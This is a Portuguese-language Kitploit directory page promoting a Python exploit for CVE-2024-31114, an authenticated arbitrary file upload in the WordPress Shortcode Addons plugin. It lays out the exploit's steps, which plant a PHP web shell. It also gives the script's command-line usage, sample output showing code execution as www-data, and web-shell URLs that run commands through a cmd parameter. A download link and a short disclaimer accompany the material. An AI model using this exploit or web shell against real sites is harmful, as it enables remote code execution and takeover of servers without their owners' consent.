Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 - Autenticado (Admin+) Upload Arbitrário de Arquivos | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-31114
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - Autenticado (Admin+) Upload Arbitrário de Arquivos

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-31114 - Exploit RCE no WordPress Shortcode Addons

Shortcode Addons <= 3.2.5 – Upload Arbitrário de Arquivo Autenticado (Admin+)
ID do CVE: CVE-2024-31114
Pontuação CVSS: 9.1 (Crítico)


🛠️ Descrição da Vulnerabilidade

O plugin Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação de tipo de arquivo em todas as versões até e incluindo a 3.2.5.

Essa falha permite que atacantes autenticados com acesso de nível administrador ou superior enviem arquivos arbitrários para o servidor — o que pode levar à Execução Remota de Código (RCE).


🚀 Descrição do Script

Este script em Python automatiza a exploração da vulnerabilidade. Ele realiza:

  1. Desabilitar verificação SSL
  2. Fazer login com as credenciais fornecidas
  3. Extrair o token CSRF (_wpnonce)
  4. Gerar um shell PHP (nxploit.php)
  5. Comprimir e enviar como um .zip
  6. Confirmar o upload e acessar o shell
  7. Executar whoami no servidor alvo

🧪 Uso

root@kitploit:~
usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password

📤 Exemplo de Saída

root@kitploit:~
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.

🐚 Uso do Web Shell

Uma vez que o payload é enviado, você pode executar comandos do sistema usando o seguinte formato:

root@kitploit:~
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command

🔹 Exemplo:

root@kitploit:~
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls

Isso listará o conteúdo do diretório atual no servidor.

⚠️ Aviso Legal

Esta ferramenta é apenas para fins educacionais e de teste autorizado.
O autor não se responsabiliza por qualquer uso indevido ou dano causado por este script.

Use com responsabilidade e apenas em sistemas para os quais você tenha permissão explícita para testar.


Por: Nxploited | Khaled Alenazi

Baixar ferramenta